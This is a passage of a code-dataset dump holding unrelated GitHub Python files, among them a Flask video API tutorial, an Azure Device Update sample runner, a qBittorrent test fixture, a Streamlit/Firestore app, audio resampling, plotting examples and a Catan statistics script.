options.normfile = data_dir+os.sep+'bart2_{}_H3K27ac.dat'.format(options.species)\n    options.dhsfile = data_dir+os.sep+'bart2_{}_UDHS.bed'.format(options.species)\n    options.tffile = data_dir+os.sep+'bart2_{}_TF_file.json'.format(options.species)\n    options.tfoverlap = data_dir+os.sep+'bart2_{}_TF_overlap.json'.format(options.species)\n    options.chromsize = script_dir+os.sep+'utility'+os.sep+'{}_clean.chrom.sizes'.format(options.species)\n    options.BgToBigWig = script_dir+os.sep+'utility'+os.sep+'bedGraphToBigWig'\n    \n    return options\n\n","repo_name":"zanglab/bart3d","sub_path":"bart3d/OptValidator.py","file_name":"OptValidator.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"8766463112","text":"# Imports\nfrom flask import Flask, request\nfrom flask_restful import Api, Resource, reqparse, abort\nfrom flask_sqlalchemy import SQLAlchemy\n\n\n# Start flask app\napp = Flask(__name__)\napi = Api(app)\napp.config['SQLALCHEMY_DATABASE_URI'] = \"sqlite:///database.db\"\ndb = SQLAlchemy(app)\n\n\n# Models\nclass VideoModel(db.Model):\n    id = db.Column(db.Integer, primary_key=True)\n    name = db.Column(db.String(100), nullable=False)\n    views = db.Column(db.Integer, nullable=False)\n    likes = db.Column(db.Integer, nullable=False)\n\n    def __repr__(self):\n        return f\"Video(name={self.name}, views={self.views}, likes={self.likes})\"\n\n\n# with app.app_context():\n#     db.create_all() # DO THIS ONLY ONCE\n\n\n# Data\npeople = {\n    'dan': {'age': 30, 'gender': 'male'},\n    'cheryl': {'age': 28, 'gender': 'female'}\n}\n\nvideos = {\n\n}\n\n# Parsers\nvideo_put_args = reqparse.RequestParser()\nvideo_put_args.add_argument('name', type=str, help='provide name as str', required=True)\nvideo_put_args.add_argument('likes', type=int, help='provide number of likes as int', required=True)\nvideo_put_args.add_argument('views', type=int, help='provide number of views as int', required=True)\n\n\n# Resources\nclass HelloWorld(Resource):\n    @staticmethod\n    def get(name: str):\n        return people[name]\n    #\n    # @staticmethod\n    # def post():\n    #     return {\"data\": \"Posted\"}\n\n\nclass Video(Resource):\n    def get(self, video_id): # gets a resource\n        self.abort_if_not_found(video_id)\n        return videos[video_id]\n\n    def post(self, video_id): # creates a resource\n        self.abort_if_found(video_id)\n        return self.put(video_id)\n\n    @staticmethod\n    def put(video_id): # creates or replaces a resource\n        args = video_put_args.parse_args()\n        videos[video_id] = args\n        return videos[video_id], 201\n\n    def delete(self, video_id): # deletes a resource\n        self.abort_if_not_found(video_id)\n        del videos[video_id]\n        return {'msg': 'deleted'}, 204\n\n    @staticmethod\n    def abort_if_not_found(video_id):\n        if video_id not in videos:\n            abort(404, message=\"video_id not found...\")\n\n    @staticmethod\n    def abort_if_found(video_id):\n        if video_id in videos:\n            abort(409, message=\"video_id already exists...\")\n\n\n# The resource methods take URL parameters, so the routes must declare them\napi.add_resource(HelloWorld, \"/helloworld/<string:name>\")\napi.add_resource(Video, \"/video/<int:video_id>\")\n\n# Main\nif __name__ == '__main__':\n    app.run(debug=True)\n","repo_name":"danbrick92/legacyRandom","sub_path":"flask_tutorial/flaskvideo.py","file_name":"flaskvideo.py","file_ext":"py","file_size_in_byte":2471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43116294536","text":"from azure.core.exceptions import HttpResponseError\nfrom 
azure.iot.deviceupdate.models import *\nfrom azure.identity import ClientSecretCredential\nfrom datetime import datetime, timezone\nimport json\nimport time\nfrom samples.contentfactory import ContentFactory\nfrom samples.consts import MANUFACTURER, MODEL, BLOB_CONTAINER, DEFAULT_RETRY_AFTER\n\n\nclass SampleRunner:\n    def __init__(self, tenant_id, client_id, client_secret, account_endpoint, instance_id, storage_name, storage_key,\n                 device_id, device_tag, **kwargs):\n        self._tenant_id = tenant_id\n        self._client_id = client_id\n        self._client_secret = client_secret\n        self._storage_name = storage_name\n        self._storage_key = storage_key\n        self._device_id = device_id\n        self._device_tag = device_tag\n        self._account_endpoint = account_endpoint\n        self._instance_id = instance_id\n        self._delete = kwargs.pop('delete', False)\n\n        credentials = ClientSecretCredential(\n            tenant_id=tenant_id,\n            client_id=client_id,\n            client_secret=client_secret\n        )\n        self._client = DeviceUpdateClient(credentials, account_endpoint, instance_id)\n\n    def run(self):\n        version = datetime.now().strftime(\"%Y.%#m%d.%#H%M.%#S\")\n\n        # Create new update and import it into ADU\n        job_id = self._import_update_step(version)\n\n        # Let's retrieve the existing (newly imported) update\n        self._retrieve_update_step(MANUFACTURER, MODEL, version, 200)\n\n        # Create deployment/device group\n        group_id = self._create_deployment_group_step()\n\n        # Check that device group contains devices that can be updated with our new update\n        self._check_group_devices_are_up_to_date_step(group_id, MANUFACTURER, MODEL, version, False)\n\n        # Create deployment for our device group to deploy our new update\n        deployment_id = self._deploy_update_step(MANUFACTURER, MODEL, version, group_id)\n\n        # Check device and wait until the new update is installed there\n        self._check_device_updates_step(MANUFACTURER, MODEL, version)\n\n        # Check that device group contains *NO* devices that can be updated with our new update\n        self._check_group_devices_are_up_to_date_step(group_id, MANUFACTURER, MODEL, version, True)\n\n        if self._delete:\n            # Delete the update\n            self._delete_update_step(MANUFACTURER, MODEL, version)\n\n            # Let's retrieve the deleted (previously imported) update and expect 404 (not found response)\n            self._retrieve_update_step(MANUFACTURER, MODEL, version, 404)\n\n        # Dump test data to be used for unit-testing\n        self._output_test_data(version, job_id, deployment_id)\n\n    def _import_update_step(self, version):\n        content_factory = ContentFactory(self._storage_name, self._storage_key, BLOB_CONTAINER)\n        update = content_factory.create_import_update(MANUFACTURER, MODEL, version)\n\n        print(\"Importing updates...\")\n        _, _, headers = self._client.updates.import_update(update, cls=callback)\n        operation_id = self._get_operation_id(headers[\"Location\"])\n        print(f\"Import operation id: {operation_id}\")\n\n        print(\"(this may take a minute or two)\")\n        repeat = True\n        while repeat:\n            _, operation, headers = self._client.updates.get_operation(operation_id, cls=callback)\n            if operation.status == \"Succeeded\":\n                print(operation.status)\n                repeat = False\n            elif operation.status == \"Failed\":\n                error = operation.errors[0]\n                raise ImportError(\"Import failed with response: \\n\" +\n                                  json.dumps(error.__dict__, default=as_dict, sort_keys=True, indent=2))\n            else:\n                print(\".\", end=\"\", flush=True)\n                time.sleep(self._get_retry_after(headers))\n        print()\n        return operation_id\n\n    def _retrieve_update_step(self, provider, name, version, expected_status):\n        print(\"Retrieving update...\")\n        
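# get_update raises HttpResponseError on a non-2xx response, so both the\n        # success path and the error path below are compared against the\n        # caller-supplied expected_status.\n        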
value = None\n        try:\n            response, value, _ = self._client.updates.get_update(provider, name, version, cls=callback)\n            status_code = response.http_response.status_code\n        except HttpResponseError as e:\n            status_code = e.status_code\n        if status_code == expected_status:\n            print(f\"Received an expected status code: {expected_status}\")\n            if value is not None:\n                print(json.dumps(value.__dict__, default=as_dict, sort_keys=True, check_circular=False, indent=2))\n            else:\n                print()\n        else:\n            raise Exception(f\"Service returned status code: {status_code}\")\n        print()\n\n    def _create_deployment_group_step(self):\n        group_id = self._device_tag\n        create_new_group = False\n\n        print(\"Querying deployment group...\")\n        try:\n            _ = self._client.devices.get_group(group_id)\n            print(f\"Deployment group {group_id} already exists.\")\n        except HttpResponseError as e:\n            if e.status_code == 404:\n                create_new_group = True\n\n        if create_new_group:\n            print(\"Creating deployment group...\")\n            group = self._client.devices.create_or_update_group(\n                group_id,\n                Group(\n                    group_id=group_id,\n                    group_type=GroupType.IO_T_HUB_TAG,\n                    tags=[group_id],\n                    created_date_time=datetime.utcnow().isoformat()\n                ))\n            if group is not None:\n                print(f\"Group {group_id} created.\")\n            print()\n\n        print(\"Waiting for the group to be populated with devices...\")\n        print(\"(this may take about five minutes to complete)\")\n        repeat = True\n        while repeat:\n            group = self._client.devices.get_group(group_id)\n            if group.device_count > 0:\n                print(f\"Deployment group {group_id} now has {group.device_count} devices.\")\n                repeat = False\n            else:\n                print(\".\", end=\"\", flush=True)\n                time.sleep(DEFAULT_RETRY_AFTER)\n        print()\n        return group_id\n\n    def _check_group_devices_are_up_to_date_step(self, group_id, provider, name, version, is_compliant):\n        print(f\"Check group {group_id} device compliance with update {provider}/{name}/{version}...\")\n        update_found = False\n        counter = 0\n\n        while not update_found and counter <= 6:\n            response = self._client.devices.get_group_best_updates(group_id)\n            group_devices = list(response)\n            for updatableDevices in group_devices:\n                update = updatableDevices.update_id\n                if update.provider == provider and update.name == name and update.version == version:\n                    update_found = True\n                    if is_compliant:\n                        if updatableDevices.device_count == 0:\n                            print(\"All devices within the group have this update installed.\")\n                        else:\n                            print(f\"There are still {updatableDevices.device_count} devices that can be updated to \" +\n                                  f\"update {provider}/{name}/{version}.\")\n                    else:\n                        print(f\"There are {updatableDevices.device_count} devices that can be updated to update \" +\n                              f\"{provider}/{name}/{version}.\")\n            counter = counter + 1\n            if not update_found:\n                print(\".\", end=\"\", flush=True)\n                time.sleep(DEFAULT_RETRY_AFTER)\n\n        if not update_found:\n            print(\"(Update is still not available for any group device.)\")\n        print()\n\n    def _deploy_update_step(self, provider, name, version, group_id):\n        print(\"Deploying the update to a device...\")\n        deployment_id = f\"{self._device_id}.{version.replace('.', '-')}\"\n        _ = self._client.deployments.create_or_update_deployment(\n            deployment_id=deployment_id,\n            deployment=Deployment(\n                deployment_id=deployment_id,\n                deployment_type=DeploymentType.complete,\n                start_date_time=datetime.now(timezone.utc),\n                device_group_type=DeviceGroupType.DEVICE_GROUP_DEFINITIONS,\n                device_group_definition=[group_id],\n                update_id=UpdateId(provider=provider, name=name, version=version)))\n        print(f\"Deployment 
'{deployment_id}' created.\")\n time.sleep(DEFAULT_RETRY_AFTER)\n\n print(\"Checking the deployment status...\")\n status = self._client.deployments.get_deployment_status(deployment_id)\n print(f\" {status.deployment_state}\")\n print()\n return deployment_id\n\n def _check_device_updates_step(self, provider, name, version):\n print(f\"Checking device {self._device_id} status...\")\n print(\"Waiting for the update to be installed...\")\n repeat = True\n while repeat:\n device = self._client.devices.get_device(self._device_id)\n installed_update = device.installed_update_id\n if installed_update.provider == provider and installed_update.name == name and installed_update.version == version:\n repeat = False\n else:\n print(\".\", end=\"\", flush=True)\n time.sleep(DEFAULT_RETRY_AFTER)\n\n print(\"\\n\")\n\n def _delete_update_step(self, provider, name, version):\n print(\"Deleting the update...\")\n _, _, headers = self._client.updates.delete_update(provider, name, version, cls=callback)\n operation_id = self._get_operation_id(headers[\"Operation-Location\"])\n print(f\"Delete operation id: {operation_id}\")\n\n print(\"Waiting for delete to finish...\")\n print(\"(this may take a minute or two)\")\n repeat = True\n while repeat:\n _, operation, headers = self._client.updates.get_operation(operation_id, cls=callback)\n if operation.status == \"Succeeded\":\n print(operation.status)\n repeat = False\n elif operation.status == \"Failed\":\n error = operation.errors[0]\n raise ImportError(\"Delete failed with response: \\n\" +\n json.dumps(error.__dict__, default=as_dict, sort_keys=True, indent=2))\n else:\n print(\".\", end=\"\", flush=True)\n time.sleep(self._get_retry_after(headers))\n print()\n\n def _get_operation_id(self, operation_location):\n return operation_location.split(\"/\")[-1]\n\n def _get_retry_after(self, headers):\n if headers is not None and headers[\"Retry-After\"] is not None:\n return int(headers[\"Retry-After\"])\n else:\n return DEFAULT_RETRY_AFTER\n\n def _output_test_data(self, version, job_id, deployment_id):\n print(\"Test data to use when running SDK unit tests:\")\n print(f'DEVICEUPDATE_TENANT_ID=\"{self._tenant_id}\"')\n print(f'DEVICEUPDATE_CLIENT_ID=\"{self._client_id}\"')\n print(f'DEVICEUPDATE_CLIENT_SECRET=\"{self._client_secret}\"')\n print(f'DEVICEUPDATE_ACCOUNT_ENDPOINT=\"{self._account_endpoint}\"')\n print(f'DEVICEUPDATE_INSTANCE_ID=\"{self._instance_id}\"')\n print(f'DEVICEUPDATE_VERSION=\"{version}\"')\n print(f'DEVICEUPDATE_OPERATION_ID=\"{job_id}\"')\n print(f'DEVICEUPDATE_DEVICE_ID=\"{self._device_id}\"')\n print(f'DEVICEUPDATE_DEPLOYMENT_ID=\"{deployment_id}\"')\n print(f'DEVICEUPDATE_PROVIDER=\"{MANUFACTURER}\"')\n print(f'DEVICEUPDATE_MODEL=\"{MODEL}\"')\n print(f'DEVICEUPDATE_DEVICE_CLASS_ID=\"b83e3c87fbf98063c20c3269f1c9e58d255906dd\"')\n print()\n print(\"Set these environment variables in your '.env' file before opening and running SDK unit tests.\")\n pass\n\n\ndef callback(response, value, headers):\n return response, value, headers\n\n\ndef as_dict(o):\n try:\n return o.__dict__\n except:\n return \"???\"\n","repo_name":"mirespace/python-azure","sub_path":"sdk/deviceupdate/azure-iot-deviceupdate/samples/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":12281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"9250022968","text":"import json\nimport subprocess\nimport tempfile\nimport time\nfrom pathlib import Path\n\nimport pytest\n\nfrom libtc import 
QBittorrentClient\n\nfrom .basetest import *\n\nQBITTORRENT_CONFIG = r\"\"\"[LegalNotice]\nAccepted=true\n\n[Network]\nCookies=@Invalid()\n\"\"\"\n\n\n@pytest.fixture(\n scope=\"module\",\n params=[\n True,\n False,\n ],\n)\ndef client(request):\n with tempfile.TemporaryDirectory() as tmp_path:\n tmp_path = Path(tmp_path)\n tmp_config_path = tmp_path / \"qBittorrent\" / \"config\" / \"qBittorrent_new.conf\"\n tmp_config_path.parent.mkdir(parents=True)\n with open(tmp_config_path, \"w\") as f:\n f.write(QBITTORRENT_CONFIG)\n\n p = subprocess.Popen([\"qbittorrent-nox\", f\"--profile={tmp_path!s}\"])\n client = QBittorrentClient(\n \"http://localhost:8080/\",\n \"admin\",\n \"adminadmin\",\n str(tmp_path / \"qBittorrent\"),\n )\n for _ in range(30):\n if client.test_connection():\n break\n time.sleep(0.1)\n else:\n p.kill()\n pytest.fail(\"Unable to start qbittorrent\")\n if request.param:\n client.label = \"testlabel\"\n if (\n \"create_subfolder_enabled\"\n in client.call(\"get\", \"/api/v2/app/preferences\").json()\n ):\n client.call(\n \"post\",\n \"/api/v2/app/setPreferences\",\n data={\"json\": json.dumps({\"create_subfolder_enabled\": request.param})},\n )\n yield client\n if (\n client.call(\"get\", \"/api/v2/app/preferences\").json()[\n \"create_subfolder_enabled\"\n ]\n != request.param\n ):\n pytest.fail(\"Settings were modified when they should not have been\")\n else:\n if request.param:\n torrent_content_layout = \"Original\"\n else:\n torrent_content_layout = \"NoSubfolder\"\n client.call(\n \"post\",\n \"/api/v2/app/setPreferences\",\n data={\n \"json\": json.dumps(\n {\"torrent_content_layout\": torrent_content_layout}\n )\n },\n )\n yield client\n p.kill()\n\n\ndef test_serialize_configuration(client):\n url = client.serialize_configuration()\n url, query = url.split(\"?\")\n assert url == \"qbittorrent+http://admin:adminadmin@localhost:8080/\"\n assert query.startswith(\"session_path=\")\n","repo_name":"JohnDoee/libtc","sub_path":"libtc/clients/tests/test_qbittorrent.py","file_name":"test_qbittorrent.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"31"} +{"seq_id":"7683216337","text":"from __future__ import (\n absolute_import,\n print_function,\n unicode_literals,\n )\n\nstr = None\n\n__metaclass__ = type\n__all__ = [\n \"check_network_namespace\",\n \"list_network_namespaces\",\n \"parse_ping_output\",\n \"retry\",\n \"synchronized\",\n \"wait_until\",\n ]\n\nimport datetime\nfrom functools import wraps\nimport re\nimport subprocess\nimport threading\nimport time\n\n\ndef retry(result_checker, num_attempts=4, delay=1):\n \"\"\"Retry calling the decorated function.\n\n :param result_checker: a callable returning True when the passed results\n means the call to the decorated function should be retried\n :param num_attempts: number of times to try before giving up\n :param delay: delay between retries in seconds\n \"\"\"\n def new_retry(func):\n @wraps(func)\n def func_retry(*args, **kwargs):\n attempts = 0\n while attempts < num_attempts - 1:\n result = func(*args, **kwargs)\n if not result_checker(result):\n return result\n else:\n time.sleep(delay)\n attempts += 1\n return func(*args, **kwargs)\n\n return func_retry\n\n return new_retry\n\n\ndef wait_until(predictate, timeout=60, timeout_msg='', delay=0.25):\n \"\"\"Wait until a predicate is true.\"\"\"\n start = datetime.datetime.utcnow()\n finish = start + datetime.timedelta(seconds=timeout)\n while datetime.datetime.utcnow() < 
finish:\n if predictate():\n return\n time.sleep(delay)\n raise Exception(\"Timed out %s\" % timeout_msg)\n\n\ndef list_network_namespaces():\n \"\"\"List the network namespaces.\"\"\"\n ns_list = subprocess.check_output(['sudo', 'ip', 'netns', 'list'])\n return ns_list.split()\n\n\ndef check_network_namespace(netns):\n \"\"\"Raise an exception if a network namespace doesn't exist.\"\"\"\n if netns not in list_network_namespaces():\n raise Exception(\"Namespace %s not in machine namespaces.\")\n\n\ndef parse_ping_output(ping_output):\n \"\"\"Parse ping output.\n\n Returns a tuple with the number of packets sent and the percentage of\n packet loss from a ping output.\"\"\"\n match = re.search(\n '(\\d*) packets transmitted, .* ([\\d\\.]*)\\% packet loss',\n ping_output)\n return match.groups() if match is not None else None\n\n\ndef synchronized(func):\n \"\"\"Decorator to make a function threadsafe.\"\"\"\n lock = threading.Lock()\n\n def wrap(*args, **kwargs):\n lock.acquire()\n try:\n return func(*args, **kwargs)\n finally:\n lock.release()\n return wrap\n","repo_name":"testiny/testiny","sub_path":"testiny/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27031404486","text":"import streamlit as st\nfrom google.cloud import firestore\nimport random\nimport string\nimport json\nfrom google.oauth2 import service_account\n\n# Authenticate to Firestore with the JSON account key.\ndb = firestore.Client.from_service_account_json(\"firestore-key.json\")\n\ndef guardar_datos(dato,user):\n\n #creamos un nombre unico\n name = ''.join(random.choices(string.ascii_letters, k=10))\n\n # Once the user has submitted, upload it to the database\n doc_ref = db.collection(\"users\").document(user)\n doc_ref.set({\n name:dato\n }, merge=True)\n\ndef buscar_datos(user):\n \n user_ref = db.collection(\"users\").document(user)\n\n user_Data = user_ref.get()\n user2 = user_Data.to_dict()\n\n if user2 is not None:\n # Sidebar para la búsqueda por título\n st.header(\"Filter by title\")\n filtro_titulo = st.text_input(\"Enter the title to search:\")\n \n categorias = ['Adult', 'Business/Corporate', 'Computers and Technology',\n 'E-Commerce', 'Education', 'Food', 'Forums', 'Games',\n 'Health and Fitness', 'Law and Government', 'News', 'Photography',\n 'Social Networking and Messaging', 'Sports', 'Streaming Services',\n 'Travel']\n\n # Sidebar para la búsqueda por categoría\n st.header(\"Filter by category\")\n filtro_categoria = st.multiselect(\"Select category\", categorias)\n\n # Filtrar datos por título y categoría\n datos_filtrados = [\n dato for dato_id, dato in user2.items() \n if filtro_titulo.lower() in dato.get(\"titulo\", \"\").lower() \n and (not filtro_categoria or dato.get(\"categoria\", \"\") in filtro_categoria)\n ]\n\n\n if datos_filtrados:\n # Mostrar los datos filtrados\n st.header(\"Filtered data\")\n count=10\n for item in datos_filtrados:\n if st.button(f\"Show description of {item['titulo']}, of the category: {item['categoria']}\",key=count ):\n st.subheader(\"Title:\")\n st.write(item['titulo'])\n st.subheader(\"Category:\")\n st.write(item['categoria'])\n st.subheader(\"Image:\")\n st.image(item['imagen'])\n st.subheader(\"Description:\")\n st.write(item[\"descripcion\"])\n st.subheader(\"LINK:\")\n st.write(item['link'])\n count+=1\n \n else: \n st.warning(\"No se encontraron datos para este usuario.\")\n \n \n else:\n st.warning(\"No se encontraron datos 
para este usuario.\")\n\nimport os\nimport firebase_admin\nfrom firebase_admin import credentials\n\nimport functools\n\ndef run_once(func):\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n if not wrapper.has_run:\n func(*args, **kwargs)\n wrapper.has_run = True\n wrapper.has_run = False\n return wrapper\n\n@run_once\ndef funcion_a_ejecutar():\n cred = credentials.Certificate(\"firestore-key.json\")\n firebase_admin.initialize_app(cred)\n print(\"Esta función se ejecutará solo una vez.\")\n","repo_name":"Andvarjo/Link_Scrapper","sub_path":"frontend/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8183163592","text":"import os\nimport sys\nimport torchaudio\nfrom tqdm import tqdm\n\ndef resample_directory(input_directory, output_directory, new_sample_rate=16000):\n \"\"\"\n Resample all files in the provided directory and its subdirectories to a specified sample rate using torchaudio.\n The audio is truncated to 1 second clips and each clip is saved as a separate file.\n \"\"\"\n\n # Walk through input directory and its subdirectories\n all_files = [os.path.join(root, name) for root, dirs, files in os.walk(input_directory) for name in files]\n wav_files = [file for file in all_files if file.endswith(\".wav\")]\n for file_name in tqdm(wav_files, desc=\"Processing audio files\", unit=\"file\"):\n # Construct full file path\n input_file_path = file_name\n\n # Load the audio file\n waveform, sample_rate = torchaudio.load(input_file_path)\n\n # Check if the audio needs to be resampled\n if sample_rate != new_sample_rate:\n # Resample the audio\n resampler = torchaudio.transforms.Resample(orig_freq=sample_rate, new_freq=new_sample_rate)\n resampled_waveform = resampler(waveform)\n\n # Truncate to 1 second clips\n total_samples = resampled_waveform.shape[1]\n one_sec_samples = new_sample_rate\n\n for i in range(total_samples // one_sec_samples):\n start = i * one_sec_samples\n end = start + one_sec_samples\n\n # Construct the output file name\n output_file_name = f\"{os.path.splitext(os.path.basename(file_name))[0]}_clip_{i}.wav\"\n output_file_path = os.path.join(output_directory, output_file_name)\n\n # Save the 1-second clip to the output directory\n torchaudio.save(output_file_path, resampled_waveform[:, start:end], new_sample_rate, encoding=\"PCM_S\", bits_per_sample=16)\n\nif __name__ == '__main__':\n # Command line arguments: input_directory and output_directory\n if len(sys.argv) != 3:\n print(\"Usage: python resample_audio.py \")\n sys.exit(1)\n\n input_directory = sys.argv[1]\n output_directory = sys.argv[2]\n\n if not os.path.isdir(input_directory):\n print(\"Error: Invalid input directory\")\n sys.exit(1)\n \n if not os.path.exists(output_directory):\n os.makedirs(output_directory)\n\n # Resample all audio files in the input directory and save to the output directory\n resample_directory(input_directory, output_directory)\n","repo_name":"Naaafis/FewShot_MusicGen","sub_path":"Hydra/data/downsample.py","file_name":"downsample.py","file_ext":"py","file_size_in_byte":2521,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"18576532649","text":"\r\n#Import Python Libraries\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\nCO2 = pd.read_csv(\"https://raw.githubusercontent.com/kho777/data-visualization/master/data/CO2.csv\")\r\nhpi16= 
pd.read_excel(\"https://github.com/kho777/data-visualization/blob/master/data/hpi2016.xlsx?raw=true\",sheet_name='Sheet1', index_col=None, na_values=['NA'])\r\nCO2.head()\r\n\r\n# Using matplotlib\r\n\r\nCO2pc=CO2[\"CO2pc\"]\r\nplt.plot(CO2pc)\r\n\r\n# Scatterplot\r\n\r\nplt.scatter(\"Region\",\"Footprint\", data=hpi16)\r\n\r\nplt.xticks(rotation='vertical')\r\n\r\nplt.xticks(rotation=45)\r\n\r\n# Using Seaborn\r\n\r\nsns.regplot(x=\"GDPPC\",\r\n y=\"Footprint\",\r\n data=hpi16, fit_reg=False)\r\n\r\nsns.stripplot(x=\"Region\",\r\n y=\"Footprint\", \r\n data=hpi16);\r\n\r\nsns.swarmplot(x=\"Region\",\r\n y=\"Footprint\", \r\n data=hpi16);\r\n\r\n# Rotate the x labels\r\n# sns.boxplot\r\n# sns.violinplot\r\n# sns.barplot\r\n# sns.factorplot ","repo_name":"datageneration/dataprogramming","sub_path":"Python/examples/example3.py","file_name":"example3.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"40134620443","text":"black = [150, 179, 149, 152, 154]\norange = [162, 181, 151, 160, 170]\n\n\ndef classPhoto(black, orange):\n for student in black:\n if student not in blackUniforms:\n blackUniforms.append(student)\n \n for student in orange:\n if student not in orangeUniforms:\n orangeUniforms.append(student)\n \n return len(blackUniforms) == len(black) and len(orangeUniforms) == len(orange)\n \nprint(classPhoto(black, orange))\n","repo_name":"rodriguesmari/Python-Test","sub_path":"class_photo.py","file_name":"class_photo.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13759084280","text":"from allauth.account.forms import SignupForm\nfrom django import forms\nfrom . 
import models\n\n\nclass MyCustomSignupForm(SignupForm):\n\n first_name = forms.CharField(max_length=30, label='First Name', widget=forms.TextInput(\n attrs={'placeholder': 'First Name'}), required=True)\n last_name = forms.CharField(max_length=30, label='Last Name', widget=forms.TextInput(\n attrs={'placeholder': 'Last Name'}), required=True)\n phone = forms.CharField(max_length=20, label='Phone', widget=forms.TextInput(\n attrs={'placeholder': '+353 XX XXX XXXX'}), required=False)\n dob = forms.DateField(label=('DOB'), widget=forms.DateInput(\n format=('%d/%m/%Y'), attrs={'type': 'date'}), required=True)\n photo = forms.ImageField(label='Photo', required=False)\n\n def save(self, request):\n user = super(MyCustomSignupForm, self).save(request)\n user.first_name = self.cleaned_data['first_name']\n user.last_name = self.cleaned_data['last_name']\n user.phone = self.cleaned_data['phone']\n user.dob = self.cleaned_data['dob']\n user.photo = self.cleaned_data['photo']\n user.save()\n return user\n\n\nclass MyFamilioForm(forms.ModelForm):\n\n class Meta:\n model = models.Familio\n fields = ['email', 'level', 'kinship']\n\n\nclass MyGroupForm(forms.ModelForm):\n\n class Meta:\n model = models.Group\n fields = ['grp_name', 'familio']\n","repo_name":"Code-Institute-Submissions/p5_familio_app","sub_path":"member/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"25064433440","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 27 16:08:00 2021\n\n@author: alext\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport catan.read_games as r\n\nif __name__ == '__main__':\n \n games = r.read_all_games()\n \n #%%\n gcount = 0\n data = []\n for game in games:\n gcount += 1\n max_turns = len(game.turns) + 1\n for p in game.players.values():\n win = p.name == game.winner\n longest_road = p.longest_road\n largest_army = p.largest_army\n gained_longest_road = p.gained_longest_road\n lost_longest_road = p.lost_longest_road\n gained_largest_army = p.gained_largest_army\n lost_largest_army = p.lost_largest_army\n num_knights = 0\n for c in p.played_cards:\n if c == 'Knight':\n num_knights += 1\n \n row = [gcount, p.name, p.isbot, win, longest_road, largest_army, gained_longest_road,\n lost_longest_road, gained_largest_army, lost_largest_army, max_turns, num_knights, p.built['road']]\n data.append(row)\n \n df = pd.DataFrame(data = data, columns = ['gid', 'player', 'bot', 'winner', 'longest_road', 'largest_army',\n 'gained_lr', 'lost_lr', 'gained_la', 'lost_la', 'game_len',\n 'num_knights', 'num_road'])\n dfs = []\n for g, gdf in df.groupby('gid'):\n bot_game = False\n if np.any(gdf.bot):\n bot_game = True\n \n gdf['bot_game'] = bot_game\n dfs.append(gdf)\n \n df = pd.concat(dfs)\n \n botless_df = df[df.bot_game == False]\n \n #%%\n \n odds_with_lr = len(df[(df.longest_road) & (df.winner)])/len(df[df.longest_road])\n odds_with_la = len(df[(df.largest_army) & (df.winner)])/len(df[df.largest_army])\n \n \n botless_odds_with_lr = len(botless_df[(botless_df.longest_road) & (botless_df.winner)])/len(botless_df[botless_df.longest_road])\n botless_odds_with_la = len(botless_df[(botless_df.largest_army) & (botless_df.winner)])/len(botless_df[botless_df.largest_army])\n \n num_roads = df[df.longest_road].num_road.mean()\n \n #%%\n \n \n \n \n #%%\n data = []\n for g, gdf in df.groupby('gid'):\n lr_options = []\n for gained_lr in 
gdf.gained_lr:\n for i in gained_lr:\n lr_options.append(i)\n if lr_options:\n first_gained_lr = np.min(lr_options)\n else:\n first_gained_lr = 0\n \n la_options = []\n for gained_la in gdf.gained_la:\n for i in gained_la:\n la_options.append(i)\n if la_options:\n first_gained_la = np.min(la_options)\n else:\n first_gained_la = 0\n \n for rrow in gdf.iterrows():\n fg_la = first_gained_la in rrow[1].gained_la\n fg_lr = first_gained_lr in rrow[1].gained_lr\n ever_gained_la = len(rrow[1].gained_la) > 0\n ever_gained_lr = len(rrow[1].gained_lr) > 0\n \n datarow = [g, rrow[1].player, rrow[1].winner, fg_la, fg_lr, ever_gained_la, ever_gained_lr]\n data.append(datarow)\n \n ddf = pd.DataFrame(data = data, columns = ['gid', 'player', 'winner', 'fg_la', 'fg_lr', 'ever_gained_la', 'ever_gained_lr'])\n \n\n #%%\n \n data = []\n for g, gdf in df.groupby('gid'):\n lr_owner = None\n la_owner = None\n prev_turn = 0\n tot_turns = gdf.game_len.max()\n for i in np.arange(0,1.05,0.05):\n for _, row in gdf.iterrows():\n for t in row.gained_lr:\n if prev_turn < t < tot_turns * i:\n lr_owner = row.player\n \n for t in row.gained_la:\n if prev_turn < t < tot_turns * i:\n la_owner = row.player\n \n newrow = [g, row.player, i, lr_owner == row.player, la_owner == row.player, \n row.bot_game, row.winner, row.longest_road, row.largest_army]\n data.append(newrow)\n \n prev_turn = tot_turns * i\n \n dddf = pd.DataFrame(data = data, columns = ['gid', 'player', 'per_turn', 'lr', 'la', 'bot', 'winner', 'end_lr', 'end_la'])\n \n \n \n #%%\n data = []\n for g, gdf in dddf.groupby('per_turn'):\n if len(gdf[gdf.lr]):\n odds_win_lr = 100*len(gdf[(gdf.lr) & (gdf.winner)])/len(gdf[gdf.lr])\n odds_end_lr = 100*len(gdf[(gdf.lr) & 